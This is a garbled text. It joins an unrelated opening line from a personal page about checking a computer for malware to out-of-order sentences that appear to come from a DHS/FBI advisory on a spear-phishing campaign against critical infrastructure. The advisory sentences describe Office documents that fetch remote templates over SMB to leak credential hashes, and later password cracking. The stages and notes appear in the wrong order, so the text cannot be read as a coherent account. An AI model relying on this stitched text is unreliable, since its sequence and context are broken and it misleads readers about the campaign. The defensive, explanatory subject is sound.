The Security Tango is my name for the dance you have to do every time you want to assure yourself that your computer is free of viruses, spyware, keystroke loggers, backdoors, trojans, and other forms of malware (click the Definitions button in the menu to see what all those things mean).
As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server prior to retrieving the requested file.
(Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors then likely used password-cracking techniques to obtain the plaintext password.
 Historically, threat actors have also targeted other critical infrastructure sectors with similar campaigns.
Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity.
Stage 2: Weaponization Throughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol.
(An example of this request is: file[:]///Normal.dotm).
It is known that threat actors are actively accessing publicly available information hosted by organization-monitored networks.
DHS further assesses that threat actors are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations.
Once actors obtain valid credentials, they are able to masquerade as authorized users.
Stage 3: Delivery When seeking to compromise the target network, threat actors used a spear-phishing email campaign that differed from previously reported TTPs.
The initial victims are peripheral organizations such as trusted third party suppliers with less secure networks.